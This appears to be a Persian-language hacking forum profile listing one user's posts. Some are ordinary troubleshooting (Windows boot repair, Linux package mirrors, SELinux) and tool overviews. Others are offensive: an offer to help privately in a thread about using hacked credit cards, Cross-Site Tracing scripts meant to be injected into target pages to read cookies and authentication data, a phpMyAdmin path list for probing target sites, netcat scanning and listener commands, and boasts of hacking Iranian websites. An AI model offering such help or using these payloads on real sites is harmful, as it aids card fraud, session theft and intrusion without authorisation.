-
ارسال ها
75 -
تاریخ عضویت
-
آخرین بازدید
-
روز های برد
14
نوع محتوا
پروفایل ها
تالارهای گفتگو
دانلودها
وبلاگها
تقویم
فروشگاه
گالری
تمامی موارد ارسال شده توسط Mr.Nashena3
-
آموزش تصویری فیکس کردن ارور 0xc000000f در ویندوز ۷٫۸٫۹٫۱۰
Mr.Nashena3 پاسخی ارسال کرد برای یک موضوع در آموزش های تصویری
با سلام از آنجایی که در انجمن چندیدن نفر این مشکل رو داشتن یک ویدیو برای حل این مشکل قرار میدم امید وارم مفید باشه کامنت های مورد نیاز bootrec /fixmbr bootrec /fixboot bootrec /ScanOs bootrec /rebuildbcd T bcdedit /export C:\BCD_Backup c: cd boot attrib bcd -s -h -r ren c:\boot\bcd bcd.old bootrec /RebuildBcd How To Fix Windows 10 Error Code 0xc00000f.mp4 -
با سلام دوست من با دستور زیر دیتابیس رو رفرش کنید احتمالا حل میشه sudo pacman-mirrors -g sudo pacman-mirrors -g اگر حل نشد میتونید لیست کشور ها را بار دیگه راه اندازی کنید wget [Hidden Content]$(uname -m)/pacman-mirrorlist-20170319-1-any.pkg.tar.xz{,.sig} ## if there is no wget installed, use curl curl --remote-name [Hidden Content]$(uname -m)/pacman-mirrorlist-20170319-1-any.pkg.tar.xz --remote-name [Hidden Content]$(uname -m)/pacman-mirrorlist-20170319-1-any.pkg.tar.xz.sig sudo pacman -U pacman-mirrorlist-20170319-1-any.pkg.tar.xz sudo pacman-mirrors --geoip -g sudo pacman -Syyu
-
استفاده از کارت های اعتباری هک شده
Mr.Nashena3 پاسخی برای arash223 ارسال کرد در موضوع : سوال و جواب های متفرقه
با سلام دوست من میتونید خصوصی پیام بدید کمکتون میکنم -
ارور 0xc000000f و read disk error
Mr.Nashena3 پاسخی برای SharyarDT ارسال کرد در موضوع : سوال و جواب های سیستم عامل ها
با سلام دوست من مدل لبتاب و یه عکس از ارور قرار بدید -
شما میتونید برای دکد از این اسکریپت استفاده کنید من اسکن کردم مشکل نداشت تا جایی که میدونم کار میکنه ولی باز خودتون اسکن کنید چون من ویندوز ندارم تست کنم چون فال سنگین بود نشد اتچ کنم این لینک دانلود [Hidden Content] اینم اسکن [Hidden Content] [Hidden Content]
-
با سلام دوست من فکر میکنم ioncube کد شده که دکد پی اچ پی ۷ پولی باشه ولی تلاشم رو میکنم
-
آموزش کامل فایروال Pfsense با سلام از اونجایی که وقت تایپ زیاد ندارم این که این فایر وال چی هست و .. رو ارجاع میدم به منابع دیگه و میریم سراغ آموزش چند نکته که باید بگم ۱. این فایر وال نیاز به یک سخت افزار قوی نداره پس برای استفاده در خانه هم مفید هست ۲. آموزش رایگان این فایروال رو من در سایت های ایرانی ندیدم ۳. شرکت های بزرگی مثل اپل از این فایروال استفاده میکنند ۴. در این تایپیک اسپم ممنوع و سوالات خود را در تایپیک جدا مطرح کنید ۵. از صبر شما مچکرم ۶. برای تشکر از دکمه تشکر اسفاده کنید ----------------------------------------------------------------------------------------------------------------------------------------------------------------- Pfsense چیست؟ Pfsense یک فایروال نرم افزاری opensource می باشد که بر پایه FreeBSD ساخته شده. میتوانید از آن به عنوان یک فایروال/ روتر استفاده نمایید و روتر اختصاصی شبکه خود را داشته باشید. در رابطه با تاریخچه ایجاد pfsense، پروژه pfsense در سال 2004 آغاز شد و اولین انتشار آن در سال 2006 بود. ویژگی های pfsense :می توانید برای فیلتر کردن IP های مبدا و مقصد بسته ها و همچنین پورت های udp و tcp از آن استفاده کنید محدود کردن تعداد connection ها بر اساس rule ها مختلف ابزار های رمز نگاری پیشرفته برای سیستم عامل و شبکه مسدود سازی و اعمال محدودیت برای سرور ها و سیستم ها بر اساس نوع سیستم عامل (برای مثال اگر بخواهید سرور های لینوکسی به اینترنت دسترسی داشته باشند و سرور های ویندوزی دسترسی به اینترنت نداشته باشد بر اساس نوع سیستم عامل می توانید برای آنها اعلام وضعیت کنید ) می توانید ترافیک ها را بر اساس نوع آنها مدیریت نمایید و برای آن ها محدودیت قاعل شوید قابلیت نرمالسازی ترافیک را دارید می توانید قابلیت فیلترینگ را به صورت کامل خاموش نمایید تا سرور شما به یک روتر ساده تبدیل شود قابلیت فیلترینگ برای لایه 2 و لایه 3 در pfsense وجود دارد می توانید حتی در لایه application نیز محدودیت هایی برای کاربران قرار دهید وجود سیستم nating برای انجام nat در pfsense قابلیت پیکربندی همزمان دو فایروال در شبکه را داراست و امکان استفاده از HA یا همان قابلیت دسترسی بالا وجود دارد. به این صورت که هر دو فایروال به صورت خودکار قابلیت تعامل با یکدیگر را دارند و در صورت از دسترس خارج شدن یکی از آنها دیگری می تواند خدمات ارائه دهد می توانید از pfsense به عنوان یک سرور مانیتورینگ برای سخت افزار و وضعیت بسته ها نیز استفاده نمایید منبع : server.ir
-
چند سوئیچ نت کت
Mr.Nashena3 پاسخی برای 0xEnc0der ارسال کرد در موضوع : سوال و جواب های ابزارهای امنیتی
سلام دوست من معمولا در نتکت مجموع چند سوئچ باهم استفاده میشه Port Scan آزمایشکنندگان نفوذ معمولا از تکنیک های اسکن پورت برای جمع آوری اطلاعات استفاده می کنند. Nmap یکی از محبوب ترین ابزار برای پیدا کردن پورت های باز است. Netcat می تواند عملکرد پورت اسکن را ارائه دهد. مزیت netcat ساده و بدون وابستگی کتابخانه است. باینری netcat تنها برای اسکن پورت کافی است و می تواند برای تمام سیستم عامل های مانند ویندوز، لینوکس، یونیکس، MacOS، BSD استفاده شود. ما از گزینه -z برای پورت اسکن مانند زیر استفاده خواهیم کرد. در این مثال ما ip آدرس 192.168.180.1 را اسکن می کنیم که می تواند نام دامنه ای مانند target.com باشد. محدوده RAngePort 1-30 مشخص شده است. $ nc -z -v 192.168.122.1 1-30 Verbose Scan حالت خاموش حالت پیش فرض است که به معنی فقط پورت های باز در کنسول چاپ شده است گزینه ای -v که اطلاعات دقیق تر را تولید می کند TCP Server یکی دیگر از ویژگی های مفید netcat به عنوان یک سرور TCP عمل می کند. Netcat می تواند به پورت مشخص شده TCP گوش دهد. اما به عنوان یک اقدام امنیتی در سیستم های لینوکس تنها کاربران دارای امتیاز می توانند پورت های بین 1-1024 را گوش دهند. در این مثال ما به پورت های TCP گوش خواهیم داد. برای دادن امتیازات مورد نیاز از دستور sudo استفاده می کنیم. sudo nc -l -p 30 Send Files Trough Netcat یکی دیگر از ویژگی های مفید netcat انتقال فایل است. این داده ها می توانند برنامه یا یک فیلم باشند. netcat -l -p 4444 > myfile.txt اکنون می توانیم فایل را از سرویس گیرنده ارسال کنیم. ما فایل thefile.txt را در سمت سرویس گیرنده با تغییر مسیر به فایل netcat مانند زیر $ nc 192.168.180.1 4444 < thefile.txt Prevent DNS Lookup با استفاده ازDNS Lookup می توانید با گزینه -n غیرفعال کنید، این باعث می شود عملیات سریع تر انجام شود. netcat -n google.com 80 همانطور که در آموزش توضیح داده شده گزینه -n نام دامنه را غیرفعال میکند. -
سوال در مورد کاربرد XST و نحوه استفاده از آن در باگ xss
Mr.Nashena3 پاسخی برای hajsajjad ارسال کرد در موضوع : سوال و جواب های نفوذ به سایت ها و سرورها و روشهای مقابله
با سلام اول بد نیست بگم ک اسم کاملش هست Cross-Site-Tracing ک به XST یا CST معروف هست XST یا CST یک فرم پیچیده از اسکریپت های (XSS) است که می تواند مانع از اقدامات امنیتی که قبلا برای محافظت در برابر XSS ایجاد شده است را کنار بگذارد. این شکل جدید حمله به نفوذگر اجازه می دهد کوکی ها و سایر اطلاعات احراز هویت را با استفاده از یک اسکریپت ساده در سمت سرویس گیرنده بدست آورد. به منظور محافظت از XST، کاربران اینترنت می توانند جاوا اسکریپت یا اکتیو ایکس را در مرورگرهای خود غیرفعال کنند. آموزش آیا هدف از HTTP TRACE پشتیبانی می کند؟ - با NetCat برای دانستن بر روی دستگاه لینوکس خود بروید و NETCAT را دانلود کنید. سپس، دستور زیر را دوست دارید nc www.target.com 80 چیزی شبیه به این باید بازگردانده شود HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Tue, 31 Oct 2006 08:00:29 GMT Connection: close Allow: GET, HEAD, POST, TRACE, OPTIONS Content-Length: 0 همانطور که در خط 5 دیده می شود، TRACE پشتیبانی می شود. با Telnet فقط این دستور را وارد کنید telnet www.target.com 80 اگر در گزارش مشاهده کنید خط "TRACE:yes"، بنابراین فعال شده است. با RESTClient (افزودنی فایرفاکس). لینک دانلود: [Hidden Content] Exploitation هدف این است که برای وارد کردن یک اسکریپت XST (= request) در یک صفحه وب Target به عنوان یک روش POST. یک مثال: <script type=”text/javascript”> [b]<!--[/b] function sendTrace () { var xmlHttp = new ActiveXObject(“Microsoft.XMLHTTP”); xmlHttp.open(“TRACE”, “INSERT_YOUR_URL_HERE”,false); xmlHttp.send(); xmlDoc=xmlHttp.responseText; alert(xmlDoc); } //--> </script> <INPUT TYPE=BUTTON OnClick=”sendTrace();” VALUE=”Send Trace Request”> توضیحات این اسکریپت را که شما می توانید در زیر ببینید : var xmlHttp = new ActiveXObject(“Microsoft.XMLHTTP”); Object ایجاد می کند xmlHttp.open(“TRACE”, “INSERT_YOUR_URL_HERE”,false); نوع درخواست، URL را مشخص می کند و اگر درخواست باید به صورت غیر همزمان انجام شود یا نه. روش: نوع درخواست - GET یا POST url: محل فایل در سرور async: true (ناهمزمان) یا false (همگام) xmlHttp.send(); برای انتقال اطلاعات به سرور استفاده می شود xmlDoc=xmlHttp.responseText; داده های پاسخ را به عنوان یک رشته دریافت کنید alert(xmlDoc); نمایش محتوای XML با استفاده از جاوا اسکریپت <INPUT TYPE=BUTTON OnClick=”sendTrace();” VALUE=”Send Trace Request”>یک دکمه را ایجاد می کند. برای بازگرداندن، اسکریپت هنگام کلیک بر روی آن شروع می شود. اسکریپت دیگر، که برای XST بهتر است: <script type=”text/javascript”> function xssDomainTraceRequest(){ var exampleCode = “var xmlHttp = new ActiveXObject(\”Microsoft.XMLHTTP\”)\;xmlHttp.open(\”TRACE\”,\”INSERT_YOUR_URL_HERE\”,false)\ ;xmlHttp.send()\;xmlDoc=xmlHttp.responseText\;alert(xmlDoc)\;”; var target = “INSERT_YOUR_URL_HERE”; cExampleCode = encodeURIComponent(exampleCode + ‘;top.close()’); var readyCode = ‘font-size:expression(execScript(decodeURIComponent(“’ + cExampleCode + ‘”)))’; showModalDialog(target, null, readyCode); } </script> <INPUT TYPE=BUTTON OnClick=”xssDomainTraceRequest()” VALUE=”Show Cookie Information Using TRACE”> توضیحات بعضی از دستورات (خب صادقانه، من توضیح نمی دم - برای اسکریپت اول ساده تر بود): توجه داشته باشید که بخشی از داده هایی که دریافت می کنید (مانند پارامتر مجوز) در BASE64 کد گذاری می شود. شما می توانید تن از رمزگشایی های BASE64 را پیدا کنید، اما من این را توصیه می کنم: [Hidden Content] شما باید یک classic JS window داشته باشید که وقتی کد اسکریپت را می بینید ظاهر می شود. در حال حاضر، تفاوت های زیادی با XSS نمی بینید. -
عدم اتصال به یوزر root در putty از طریق ssh
Mr.Nashena3 پاسخی برای m_hadi1989 ارسال کرد در موضوع : کالی لینوکس Kali Linux
با سلام خوب دوست من شما طبق آموزش زیر عمل کنید # apt-get update # apt-get install ssh # systemctl enable ssh # service ssh start این فایل رو ادیت کنید /etc/ssh/sshd_config کد زیر را اضافه کنید FROM: #PermitRootLogin prohibit-password TO: PermitRootLogin yes و در آخر # service ssh restart اگر باز مشکل حل نشد بگید -
به دست آوردن آدرس دیتابیس
Mr.Nashena3 پاسخی برای OOOHHHAAACCCKKKOOO ارسال کرد در موضوع : سوال و جواب های نفوذ به سایت ها و سرورها و روشهای مقابله
با سلام میتونید این لیست رو تست کنید. /phpMyAdmin/ /phpmyadmin/ /PMA/ /admin/ /dbadmin/ /mysql/ /myadmin/ /phpmyadmin2/ /phpMyAdmin2/ /phpMyAdmin-2/ /php-my-admin/ /phpMyAdmin-2.2.3/ /phpMyAdmin-2.2.6/ /phpMyAdmin-2.5.1/ /phpMyAdmin-2.5.4/ /phpMyAdmin-2.5.5-rc1/ /phpMyAdmin-2.5.5-rc2/ /phpMyAdmin-2.5.5/ /phpMyAdmin-2.5.5-pl1/ /phpMyAdmin-2.5.6-rc1/ /phpMyAdmin-2.5.6-rc2/ /phpMyAdmin-2.5.6/ /phpMyAdmin-2.5.7/ /phpMyAdmin-2.5.7-pl1/ /phpMyAdmin-2.6.0-alpha/ /phpMyAdmin-2.6.0-alpha2/ /phpMyAdmin-2.6.0-beta1/ /phpMyAdmin-2.6.0-beta2/ /phpMyAdmin-2.6.0-rc1/ /phpMyAdmin-2.6.0-rc2/ /phpMyAdmin-2.6.0-rc3/ /phpMyAdmin-2.6.0/ /phpMyAdmin-2.6.0-pl1/ /phpMyAdmin-2.6.0-pl2/ /phpMyAdmin-2.6.0-pl3/ /phpMyAdmin-2.6.1-rc1/ /phpMyAdmin-2.6.1-rc2/ /phpMyAdmin-2.6.1/ /phpMyAdmin-2.6.1-pl1/ /phpMyAdmin-2.6.1-pl2/ /phpMyAdmin-2.6.1-pl3/ /phpMyAdmin-2.6.2-rc1/ /phpMyAdmin-2.6.2-beta1/ /phpMyAdmin-2.6.2-rc1/ /phpMyAdmin-2.6.2/ /phpMyAdmin-2.6.2-pl1/ /phpMyAdmin-2.6.3/ /phpMyAdmin-2.6.3-rc1/ /phpMyAdmin-2.6.3/ /phpMyAdmin-2.6.3-pl1/ /phpMyAdmin-2.6.4-rc1/ /phpMyAdmin-2.6.4-pl1/ /phpMyAdmin-2.6.4-pl2/ /phpMyAdmin-2.6.4-pl3/ /phpMyAdmin-2.6.4-pl4/ /phpMyAdmin-2.6.4/ /phpMyAdmin-2.7.0-beta1/ /phpMyAdmin-2.7.0-rc1/ /phpMyAdmin-2.7.0-pl1/ /phpMyAdmin-2.7.0-pl2/ /phpMyAdmin-2.7.0/ /phpMyAdmin-2.8.0-beta1/ /phpMyAdmin-2.8.0-rc1/ /phpMyAdmin-2.8.0-rc2/ /phpMyAdmin-2.8.0/ /phpMyAdmin-2.8.0.1/ /phpMyAdmin-2.8.0.2/ /phpMyAdmin-2.8.0.3/ /phpMyAdmin-2.8.0.4/ /phpMyAdmin-2.8.1-rc1/ /phpMyAdmin-2.8.1/ /phpMyAdmin-2.8.2/ /sqlmanager/ /mysqlmanager/ /p/m/a/ /PMA2005/ /pma2005/ /phpmanager/ /php-myadmin/ /phpmy-admin/ /webadmin/ /sqlweb/ /websql/ /webdb/ /mysqladmin/ /mysql-admin/ -
سلام دوست من سوالت معلوم نیست پرت کجا باز کنی؟
-
با سلام خوب همین اول بابت غلت ها املایی عذر میخوام پای بی سوادی نزارین تاپیک جالبی بود گفتم منم بگم من که اسمم همون مستر ناشناس هست و خودم رو یک هکر نمیدونم ولی خوب هک و امنیت رو دوست دارم من هم مثل بقیه دوستان از بچگی شروع کردن با داس و ویندوز و... حال هم لینوکس زمان یاهو تیم امنیتی داشتم وبرنامه های مختلف برای یاهو مینوشتم مثل بوتر کرکر دی اکتیور آیدی میکر و امسال اینها دوستان یادشونه هنوز تو بعضی از سایت های خارجی اون برنامه ها هست بعد چندین سال کافی نت داشتم که اون زمان ای دی اس ال نبود چند خط تلفن داشتم بعد های ای دی اس ال آمد اولین بار هک ای دی اس ال در ایران آموزشش رو من ساختم اگر اشتباه نکنم یا دروغ نگم که باعث معروفیتم شد بعد از اون شروع به هک سایت ها معتبر ایرانی کردم ( بچه بودیم دیگه ) الانم بچه ایم :(( ( اینم بگم که خیلی از کارها رو نمیتونم بگم چون ما اکثر کارهامون بدون اسم و نشون انجام میشه مثل بقیه دوستان فقط بچه بازی هاشو میتونم بگم بعد هم که از ایران رفتم و چندین سال در شرکت اس آ پی SAP مشغول بودم . الانم که مهم نیست کجام و چه میکنم کوچک ترین عضو اینجا هستم و در مقابل دوستان ما شاگرد و تماشاگریم/ یا علی فعلا/
-
امنیت با هاردنینگ Hardening چگونه است؟
Mr.Nashena3 پاسخی برای opsec ارسال کرد در موضوع : حملات شبکه و راههای مقابله
با سلام خوب من هم بعد از مدت ها دارم به پست میزارم بریم سراغش . فعال کردن SELinux خیلی کوتاه میگم برای این کار اول باید بدونید که SELinux میشه به سه حالت پیکربندی کرد Disabled: Turned-off Permissive: Prints warnings Enforcing: Policy is enforced خوب ابتدا با فرمان زیر فایل کامفیگ رو ادیت میکنیم #nano /etc/selinux/config بعد از آن SELINUX را به حالت enforcing تعغییر بدید SELINUX=enforcing تصویر امید وارم مفید بوده باشه -
نسخه جدید ترش رو میتونید از سایت خود نرم افزار به آدرس زیر دانلود کنید. دانلود
-
اموزش باگ HTML form without CSRF protection
Mr.Nashena3 پاسخی برای mojtabamobham ارسال کرد در موضوع : سوال و جواب های نفوذ به سایت ها و سرورها و روشهای مقابله
لینک آموزش رو دوستمون قرار داد شما کجاش دقیقا مشکل داری -
اموزش باگ HTML form without CSRF protection
Mr.Nashena3 پاسخی برای mojtabamobham ارسال کرد در موضوع : سوال و جواب های نفوذ به سایت ها و سرورها و روشهای مقابله
با سلام دوست من مهم نیست که در کدام بخش هست شما باید صفحه لوگین رو پیدا کنید و از آنجا حمله رو انجام بدید -
با سلام نه دوست من اگر فقط اسکن باشه و مشکلی برای سایت ایجاد نشه اسکن هیچ سایتی حتی سایت دولتی ایرانی جرم نیست
-
۱۰ ابزار برتر هک ۲۰۱۸ - hacker tools top 10 ۱۰ ابزار برتر هک ۲۰۱۸ - Hacker Tools Top 10
Mr.Nashena3 پاسخی برای Mr.Nashena3 ارسال کرد در موضوع : اسکنرها و ابزارهای هکینگ
۲. Metasploit Penetration Testing Software پروژه متااسپلویت — پروژه اختصاص داده شده به امنیت اطلاعات است. طراحی شده برای ارائه اطلاعات در مورد آسیبپذیری ایجاد یک امضا برای شناسهایجاد و تست از سوء استفاده. معروفترین پروژه چارچوب متاسپلویت — یک بستر مناسبی برای ایجاد و اشکال زدایی سوء استفاده است. این پروژه شامل پایه opcodes بایگانی شل کد و اطلاعات مربوط به تحقیقات امنیت کامپیوتر است. متاسپلویت در ژوئیه سال ۲۰۰۳ ایجاد شد است. نسخه ۱٫۰ نوشته شده با زبان پرل و شامل رابط کاربری گرافیکی بر اساس curses است. ساخته شده توسط HD Moore. هنگامی که کار بر روی نسخهای (۲.x) او با مت میلیر و چند داوطلب همکاری میکند. نسخه سوم به طور کامل به زبان روبی بازنویسی شد و توسط Metasploit, LLC توسعه یافت. (تأسیس شده توسط توسعه دهندگان در سال ۲۰۰۶). در سال ۲۰۰۸ مجوز از چارچوب متاسپلویت اختصاصی به BSD تغییر کرد. در سال ۲۰۰۹ شرکت Rapid7 درگیر در مدیریت آسیبپذیری او اعلام کرد متاسپلویت محبوب منبع باز بسته دو منظوره برای انجام تست نفوذ. غیر تجاری نسخه هنوز هم در دسترس برای همه خواهد بود. به عنوان همتایان تجاری، با نسخه رایگان از متاسپلویت هر دو توسط مدیران سیستم و متخصصان امنیتی برای محافظت از سیستمهای کامپیوتری و هکرها-یا کراکرهای scriptkiddies برای به دست آوردن دسترسیهای غیرمجاز برای کنترل سیستمها از راه دور استفاده میشود. چارچوب متاسپلویت یک ابزار برای تست نفوذ و استفاده از اکسپلویت است که اجازه میدهد تا شما طراحی و اکسپلویتهای لازم در این مورد خاص از فشار نبرد که پیلود است که در صورت عدم موفقیت حمله برای مثال نصب یک پوسته یا یک VNC سرور امکانپذیر میکند. همچنین این چارچوب امکان رمز نگاری کد شل را میدهد که میتواند این حمله از شناسه یا IPSپنهان کند. برای حمله به سرور از راه دور سرویسها و نسخهها که نیاز تحقیقات بیشتری دارد میتوان با کمک ابزار انمپ یا nessus انجام داد. پایگاه opcodes ابزار مورد نیاز برای نوشتن اکسپلویتهای جدید. این ابزار به شما اجازه میدهد که اکسپلویت که با نسخههای مختلف سیستم عامل طراحی و کد نویسی کنید. نرمافزار متااسپلویت (به انگلیسی: Metasploit) یک نرمافزار قوی برای نفوذ به سیستمهای دیگر است. این نرمافزار امکان دسترسی به شل قربانی را به راحتی حتی بر روی ویندوز ۷ فراهم میکند. طرز کار این نرمافزار، برای شما پیوندی به برای آیپیتان با فایل نفوذ ایجاد میکند. کسی که روی این پیوند کلیک کند، این فایل را وارد رایانهٔ خود کرده و پس از وارد شدن این فایل به رایانهٔ فرد شما میتوانید به راحتی دستورهای گوناگون را بر روی رایانهٔ فرد قربانی اجرا کنید. سیستمهای میزبان این نرمافزار امکان نصب بر روی گنو/لینوکس، ویندوز و مک اواس را دارا میباشد. برای نسخهٔ لینوکس از روبی استفاده شده است. منبع : [Hidden Content] [Hidden Content] دانلود : Download -
نصب wine در کالی
Mr.Nashena3 پاسخی برای Kavehesi1847844 ارسال کرد در موضوع : سوال و جواب های سیستم عامل ها
با سلام دوست من شما مخازن رو آپدیت کن برای این کار از آموزش زیر استفاده کنید بعد از آن کالی رو آپدیت و آپگریت کنید برای این کار از فرمان زیر استفاده کن apt-get update && apt-get upgrade بعد از آن وین رو نصب کن اگر باز مشکلی داشتی اینجا اعلام کن با عکس تا من یا دوستان دیگه کمک کنن -
۱۰ ابزار برتر هک ۲۰۱۸ - hacker tools top 10 ۱۰ ابزار برتر هک ۲۰۱۸ - Hacker Tools Top 10
Mr.Nashena3 پاسخی برای Mr.Nashena3 ارسال کرد در موضوع : اسکنرها و ابزارهای هکینگ
1. Nmap (Network Mapper) انمپ (به انگلیسی: Nmap) (برگرفته از حروف اول Network Mapper) یک پویشگر امنیتی است که در ابتدا به دست گُردُن لیون (با اسم مستعار فیودور واسکوویچ) نوشته شده و برای کشف میزبانها و خدمتگزاران در یک شبکه رایانهای و در نتیجه ایجاد یک «نگاشت» از شبکه، استفاده میشود. برای این منظور انمپ بستههای دستکاری شده را به سمت هدف میفرستد و سپس پاسخ آنها را تحلیل میکند. برخلاف بسیاری از پویشگرهای ساده پورت (port scanner) که فقط با یک نرخ ارسال ثابت که از قبل تعیین شده بستهها را ارسال میکنند، انمپ شرایط شبکه (نوسانات تأخیر، ازدحام شبکه، تداخل هدف در پویش) را نیز در نظر میگیرد. همچنین با در دست داشتن جامعه کاربری بزرگی که بازخورد میدهند و در تکامل امکانات آن شرکت میکنند، انمپ قادر به توسعه بیش از پیش قابلیتهای اکتشافیاش خارج از محدوده فقط فهم باز و بسته بودن پورت یا در دسترس بودن میزبان بوده است؛ انمپ قادر است سیستم عامل هدف، نام و نسخه خدمات (services)، مدت زمان تخمینی در دسترس بودن (uptime)، نوع دستگاه و حضور فایروال را تشخیص دهد. انمپ روی لینوکس، ویندوز، سولاریس، HP-UX و نسخههای مختلف بی اس دی (شامل مک اواس ایکس) و همچنین آمیگا اواس و SGI IRIX اجرا میشود. رایجترین سکوی اجرای انمپ، لینوکس است که ویندوز با اختلاف کمی آن را دنبال میکند. ویژگیها از ویژگیهای انمپ میتوان موارد زیر را نام برد: کشف میزبان - تشخیص میزبانها در شبکه (بر اساس پاسخ به پینگ (Ping) یا بازبودن پورت خاص) پویش پورتها تشخیص نسخه برنامهها و خدمات تشخیص سیستم عامل تعامل به شکل اسکرپتی با هدف - با استفاده از موتور اسکریپت انمپ (Nmap Scripting Engine)و زبان لوا، میتوان پرسوجوهای سفارشی ساخت. علاوه بر موارد بالا، انمپ اطلاعات بیشتری از اهداف شامل برگردان نام دیاناس، اطلاعات قطعات، و آدرس مک را فراهم سازد. موراد استفاده از انمپ: بررسی امنیت شبکه یک دستگاه با کشف اتصالات شبکهاس که میتواند به آن وصل شود. کشف پورتباز روی هدف قبل از تست نفوذپذیری سیستم. لیست گیری شبکه، نگاشت، نگهداری و مدیریت منابع شبکه. بررسی امنیت شبکه با کشف سرویسهای جدید پیشبینی نشده. منبع : [Hidden Content] دانلود : Download -
۱۰ ابزار برتر هک ۲۰۱۸ - hacker tools top 10 ۱۰ ابزار برتر هک ۲۰۱۸ - Hacker Tools Top 10
Mr.Nashena3 پاسخی ارسال کرد برای یک موضوع در اسکنرها و ابزارهای هکینگ
با سلام در این پست میخوام ۱۰ ابزار برتر هک در سال ۲۰۱۸ رو در اینجا معرفی کنم امیدوارم که مفید باشه سوالات خود راجب هر یک از ابزار رو در یک پست جدید اعلام کنید با تشکر Mr.Nashena3 -
web vulnerability scanners - وب اسکنرها Web Vulnerability Scanners - وب اسکنرها
Mr.Nashena3 پاسخی برای Mr.Nashena3 ارسال کرد در موضوع : اسکنرها و ابزارهای هکینگ
۱۰. Paros Proxy Paros ابزاری یک ابزار با ارزش برای کارشناسان امنیت نرم افزار محسوب می شو که ضمن تست کردن امنیت نرم افزارهای تحت وب ، آسیب پذیری های معمول آنها را هم شناسایی می کند. Paros می تواندی به عنوان یک Spider یا Crawler نیز عمل کند و کل محتویات یک وب سایت را کپی کند و جالب اینجاست که بعد از انجام داده این Crawl می تواند بر روی این صفحات تست های آسیب پذیری را انجام دهد و آنها را اسکن کند. دانلود : Download- 12 پاسخ
-
- وب اسکنرها
- scanners
-
(و 5 مورد دیگر)
برچسب زده شده با :
-
web vulnerability scanners - وب اسکنرها Web Vulnerability Scanners - وب اسکنرها
Mr.Nashena3 پاسخی برای Mr.Nashena3 ارسال کرد در موضوع : اسکنرها و ابزارهای هکینگ
۹. Nikto ابزارها و برنامه های زیادی به منظور پیداکردن آسیب پذیری های موجود در وبسایت ها وجود دارد ولی یکی از ساده ترین این ابزارها , ابزار نیکتو Nikto می باشد . هرچند که ابزار نیکتو بسیار قدیمی است ولی هنوز هم یکی از اسکنرهای محبوب به شمار می رود . این ابزار ساده و کوچک وبسایت هدف را مورد آزمون قرار می دهد و به شما گزارش آسیب پذیری های بالقوه موجود یافت شده را می دهد . آسیب پذیری هایی که با استفاده از آنها احتمال بکارگیری و هک سایت هدف وجود دارد . دانلود : Download- 12 پاسخ
-
- وب اسکنرها
- scanners
-
(و 5 مورد دیگر)
برچسب زده شده با :
-
web vulnerability scanners - وب اسکنرها Web Vulnerability Scanners - وب اسکنرها
Mr.Nashena3 پاسخی برای Mr.Nashena3 ارسال کرد در موضوع : اسکنرها و ابزارهای هکینگ
۸. Netsparker Netsparker Professional برای اسکن اولیه ضعف ها و نقاط امنیتی آسیب پذیر یک وب سایت، یا یک دایرکتوری مشخص و یا حتی یک وب اسکریپت که تحت سایت های AJAX/javascript کار می کند، استفاده می شود دانلود : Download- 12 پاسخ
-
- وب اسکنرها
- scanners
-
(و 5 مورد دیگر)
برچسب زده شده با :